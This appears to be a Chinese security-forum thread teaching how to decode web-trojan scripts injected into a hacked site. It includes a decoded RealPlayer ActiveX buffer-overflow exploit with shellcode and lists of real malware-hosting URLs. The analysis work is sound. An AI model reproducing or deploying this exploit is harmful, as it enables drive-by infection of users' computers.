瑞星卡卡安全论坛

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

首先我们将要分析的网址复制粘贴至freshow的url，check链接一下这个网站获取网站源代码，见下图：


 

在获取网站源码后，我们先来简单分析一下这个网站的源代码，这也是网马解密优先需要做的，因为有些被挂的恶意网址链接会在网站的头部、中间、及末尾，先要大体对所要分析网站源代码有所了解。这也是网马解密时需要养成的习惯。

  好了，来看看我们要分析的网站源代码，我将网站源码中异常部分截图，见下图：

上述红框中很多的js脚本很可疑，我们在网马解密初级篇中有介绍到js脚本挂马的方式。好接下来使用filter将script过滤出来。



filter过滤出的script，类型type为wide实际就是分析的网站地址。实际上这个网站被挂了6处，其中两处是一样链接，剩余4处链接地址是一样的。我们只要解出一个即可，其余都一样。

好我们将依次来分析由freshow过滤出的script，我们d点击数据收集区的wide下的第一个script：http://%33%38%7A%75%2E%63%6E，这个网址会自动在url区中，方便下一步的分析。





点击check来获取网站的源代码。

点击check后我们看到static状态为dns failed说明此链接已失效。
第二个script和第一个一样就不用再分析，直接看第三个js。

如法炮制选中http://%61%2E%6C%69%61%6F%62%61%6D%6D%2E%63%6F%6D/js.js，点击check来获取网站源代码。

上图源代码中有个frame，而这个frame链接(src)到一个http://www.hbhfz.com/jo/360.htm网址，在frame前还有一个document.write函数，还记得我们前期讲解的document.write的特征嘛，Document.write函数是将字符串转换为Html代码，里面必须有HTML脚本标签，脚本才可以执行，否则，将会被当作字符串输出在网页上。实际上当我们访问http://www.biaozhi.com.cn/english/show/index.asp这个网站后会直接访问http://www.hbhfz.com/jo/360.htm网址，好接下来我们点击filter过滤出这个frame，再来进一步的分析这个frame。

在这里我们需要先将网址简单处理一下，http://www.biaozhi.com.cn/english/show/http:\/\/www.hbhfz.com\/jo\/360.htm，将http://www.biaozhi.com.cn/english/show/部分删除，在将http:\/\/www.hbhfz.com\/jo\/360.htm中的“\”删除，教大家一个小技巧，先将要处理的地址粘贴至上操作区域，直接点击decode按钮，这样就可以过滤掉反斜杠。

我们将处理好的网址粘贴至url处，点击check获取网站源代码。
红色框内容为36.htm网站内嵌一个frame。

如法炮制filter将其过滤出来。在这里我们一定要注意一定要点中数据收集区的http://www.biaozhi.com.cn/english/show/http:\/\/www.hbhfz.com\/jo\/360.htm，再filter这样会自动将x.htm显示在http://www.biaozhi.com.cn/english/show/http:\/\/www.hbhfz.com\/jo\/360.htm下面。

上图为x.htm网址的源代码，我们看到有很多的frame，点击filter将frame过滤出。

上图红色框中的就是从x.htm中通过filter过滤出的1个script和8个frame。接下来我们将依次进行分析。



上图为all.css源代码，是个eval加密，我们直接用在线解密工具进行解密即可。

我们将通过在线解密出的eval代码，粘贴至freshow上操作区域。通过filter过滤出3.htm和4.htm。




接下来分析3.htm这个地址。



上图为3.htm源代码

我们将3.htm源码复制粘贴至记事本上，3.htm的源代码内容很多且乱，小技巧：当我们遇到一个不知如何解密的网马时，先尝试在源码中搜索eval或document.write这两个函数，下图为在3.htm中搜索到document.write函数。



接下来就好办了，将document.write替换为alert函数，将代码保存为扩展名为htm，文件名任意的文件。

我们将替换好的源代码保存为test.htlm，双击运行打开，上两幅截图是浏览网页的内容，我们看到3.htm实际上暗含了一个script：3.css，通过ctrl+a及ctrl+c将代码复制粘贴至freshow的上操作区域。

上图为将3.css复制至上操作区域，通过filter过滤出3.css




上述截图为3.css的源码，这个代码很熟悉，在document.write教程篇中，我们见过类似代码，实际上这是一个alpha2加密。

在这里加密选项先选择alpha2进行一次decode后，点击up按钮一次解密出的结果上翻至上操作区域。


将解密选项选择为esc，进行二次解密，在下操作区域中，红色框为解密出网马地址。

我们将解密出网马地址复制粘贴至obj区，点击insert按钮将其插入到数据收集区，至此其中一个恶意网址分析告一段落。补充：当所有恶意网址分析完毕后，点击all按钮选择所有，点击log按钮格式化输出分析结果，直接在论坛发帖，可以和别人分享你的解密结果:kaka12:

Log is generated by FreShow.
[wide]http://www.biaozhi.com.cn/english/show/index.asp
    [script]http://%33%38%7A%75%2E%63%6E
    [script]http://%33%38%7A%75%2E%63%6E
    [script]http://%61%2E%6C%69%61%6F%62%61%6D%6D%2E%63%6F%6D/js.js
    [frame]http://www.biaozhi.com.cn/english/show/http:\/\/www.hbhfz.com\/jo\/360.htm
        [frame]http://www.hbhfz.com/jo/x.htm
            [script]http://www.hbhfz.com/jo/all.css
                [frame]http://www.hbhfz.com/jo/3.htm
                    [script]http://www.hbhfz.com/jo/3.css
                        [object]http://cao360.vu.cx/bb.css
这个不是完整的结果，期待你分析的最终结果哟！！！

好了，接下来的几个恶意网址，解密方法都一样，感兴趣的网友可以参考本教程，来完成后续的解密，这也是给大家练习的机会。网马解密贵在实战，只有亲身参与了解密的过程，才能真正的掌握所学内容。

:kaka12:有看头

caors.dll:kaka6:

赶快抢位学习

不错
学习了

貌似有个real漏洞的？

没解出来

<localhost>


<script>
function alsyka()
{
var user = navigator.userAgent.toLowerCase();
if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
return;
if(user.indexOf("nt 5.")==-1)
return;
VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Real = new ActiveXObject(VulObject);
}catch(error)
{
return;
}

Real10Version = Real.PlayerProperty("PROD"+"UCTVERSION");
Padding = "";
JmpOver = unescape("%75%06%74%04");
for(i=0;i<32*148;i++)
Padding += "S";

if(Real10Version.indexOf("6.0.14.") == -1)
{
var CAORISv="SB";
if(navigator.userLanguage.toLowerCase() == "zh-cn")
ret = unescape("%7f%a5%60");
else if(navigator.userLanguage.toLowerCase() == "en-us")
ret = unescape("%4f%71%a4%60");
else
return;
}
else if(Real10Version == "6.0.14.544")
ret = unescape("%63%11%08%60");
else if(Real10Version == "6.0.14.550")
ret = unescape("%63"+"%11%04%60");
else if(Real10Version == "6.0.14.552")
ret = unescape("%79%31%01%60");
else if(Real10Version == "6.0.14.543")
ret = unescape("%79%31%09%60");
else if(Real10Version == "6.0.14.536")
ret = unescape("%51%11%70%63");
else
return;

if(Real10Version.indexOf("6.0.10.") != -1)
{
for(i=0;i<4;i++)
Padding = Padding + JmpOver;
Padding = Padding + ret;
aaa ="aaabc"
}
else if(Real10Version.indexOf("6.0.11.") != -1)
{
for(i=0;i<6;i++)
Padding = Padding + JmpOver;
Padding = Padding + ret;
aaa ="aaabc"
}
else if(Real10Version.indexOf("6.0.12.") != -1)
{
for(i=0;i<9;i++)
Padding = Padding + JmpOver;
Padding = Padding + ret;
aaa ="aaabc"
}
else if(Real10Version.indexOf("6.0.14.") != -1)
{
for(i=0;i<10;i++)
Padding = Padding + JmpOver;
Padding = Padding + ret;
aaa ="aaabc"
}

AdjESP = "LLLL\\"+"XXXXXLD";
Shell ="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkR0qJPJP3YY0fNYwLEQk0";
Shell2="p47zpfKRKJJKVe9xJKYoIoYolOoCQv3VsVwLuRKwRvavbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDU";
Shell3="BzJMEBsHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGONuKpTRrNWOVYM5mqqr";
Shell4="wSMTnoeoty08JMnKJMgPw2pey5MgMWQuMwrunOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmL";
Shell5="Hmz1KUOPCXHmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQKe6pfQvXeMpPuVP";
Shell6="wP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOV";
Shell7="tvTv4uP0DvLYfQOjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWLgOzmMTk8PU";
Shell8="oVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVi";
PayLoad = Padding + AdjESP + Shell + Shell2 + Shell3 +Shell4+Shell5+Shell6+Shell7+Shell8+Shell9;
while(PayLoad.length < 0x8000)
PayLoad += "ChuiZi"; h=Real;
h["I"+"mport"]("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);
}
alsyka();

</script>

又变了。。。
关于:hxxp://www.biaozhi.com.cn/english/show/index.asp解密的日志(全体输出 -  26):

Level  0>http://www.biaozhi.com.cn/english/show/index.asp
Level  1>http://a.liaobamm.com/js.js
Level  2>http://www.jindouxiang.com/jian/360.htm
Level  3>http://www.jindouxiang.com/jian/x.htm
Level  4>http://www.jindouxiang.com/jian/7.htm
Level  5>http://www.jindouxiang.com/jian/7.css  ●
Level  6>http://kkps.vu.cx/bb.css  ●
Level  4>http://www.jindouxiang.com/jian/2.htm
Level  5>http://www.jindouxiang.com/jian/2.css  ●
Level  6>http://kkps.vu.cx/bb.css  ●
Level  4>http://www.jindouxiang.com/jian/cx.htm
Level  5>http://www.jindouxiang.com/jian/2.css  ●
Level  6>http://kkps.vu.cx/bb.css  ●
Level  4>http://www.jindouxiang.com/jian/bf.htm
Level  5>http://www.jindouxiang.com/jian/bf.css  ●
Level  6>http://kkps.vu.cx/bb.css  ●
Level  4>http://www.jindouxiang.com/jian/office.htm
Level  4>http://www.jindouxiang.com/jian/s.htm
Level  4>http://www.jindouxiang.com/jian/newlz.htm
Level  4>http://www.jindouxiang.com/jian/1.htm
Level  4>http://www.jindouxiang.com/jian/all.css  ●
Level  3>http://www.jindouxiang.com/jian/iie.swf  ●
Level  4>http://www.jindouxiang.com/jian/win%209,0,115,0i.swf  ●
Level  5>http://kkps.vu.cx/bb.css
Level  1>http://38zu.cn
Level  1>http://www.biaozhi.com.cn/english/show/a

解密：cchao21(打点的均为真实木马地址)

斑竹传个freshow上来共同学习下

这个帖http://bbs.ikaka.com/showtopic-8625080.aspx三楼有工具的下载

谢了:kaka12:

:default69: :default69: 我顶啊